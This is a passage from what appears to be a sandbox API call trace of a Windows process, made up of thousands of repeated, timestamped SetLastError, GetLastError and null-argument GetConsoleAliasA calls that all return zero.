SetLastError (dwErrCode=0x0) [0045.640] GetLastError () returned 0x0 [0045.640] SetLastError (dwErrCode=0x0) [0045.640] GetLastError () returned 0x0 [0045.640] SetLastError (dwErrCode=0x0) [0045.640] GetLastError () returned 0x0 [0045.640] SetLastError (dwErrCode=0x0) [0045.640] GetLastError () returned 0x0 [0045.640] SetLastError (dwErrCode=0x0) [0045.640] GetLastError () returned 0x0 [0045.641] SetLastError (dwErrCode=0x0) [0045.641] GetLastError () returned 0x0 [0045.641] SetLastError (dwErrCode=0x0) [0045.641] GetLastError () returned 0x0 [0045.641] SetLastError (dwErrCode=0x0) [0045.641] GetLastError () returned 0x0 [0045.641] SetLastError (dwErrCode=0x0) [0045.641] GetLastError () returned 0x0 [0045.641] SetLastError (dwErrCode=0x0) [0045.641] GetLastError () returned 0x0 [0045.641] SetLastError (dwErrCode=0x0) [0045.641] GetLastError () returned 0x0 [0045.641] SetLastError (dwErrCode=0x0) [0045.641] GetLastError () returned 0x0 [0045.641] SetLastError (dwErrCode=0x0) [0045.641] GetLastError () returned 0x0 [0045.641] SetLastError (dwErrCode=0x0) [0045.641] GetLastError () returned 0x0 [0045.642] SetLastError (dwErrCode=0x0) [0045.642] GetLastError () returned 0x0 [0045.642] SetLastError (dwErrCode=0x0) [0045.642] GetLastError () returned 0x0 [0045.642] SetLastError (dwErrCode=0x0) [0045.642] GetLastError () returned 0x0 [0045.642] SetLastError (dwErrCode=0x0) [0045.642] GetLastError () returned 0x0 [0045.642] SetLastError (dwErrCode=0x0) [0045.642] GetLastError () returned 0x0 [0045.642] SetLastError (dwErrCode=0x0) [0045.642] GetLastError () returned 0x0 [0045.642] SetLastError (dwErrCode=0x0) [0045.642] GetLastError () returned 0x0 [0045.642] SetLastError (dwErrCode=0x0) [0045.642] GetLastError () returned 0x0 [0045.642] SetLastError (dwErrCode=0x0) [0045.643] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.643] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.643] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.643] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.643] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.643] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.643] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.643] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.643] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.643] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.643] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.643] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.643] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.643] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.643] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.644] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.645] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.646] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.647] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.648] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.648] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.648] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.648] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.648] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.648] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.648] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.648] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.648] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.648] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.648] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.648] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.648] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.648] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.649] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.649] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.649] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.649] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.649] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.649] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.649] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.649] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.649] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.649] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.649] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.649] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.649] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.649] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.649] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.649] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.649] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.649] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.649] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, 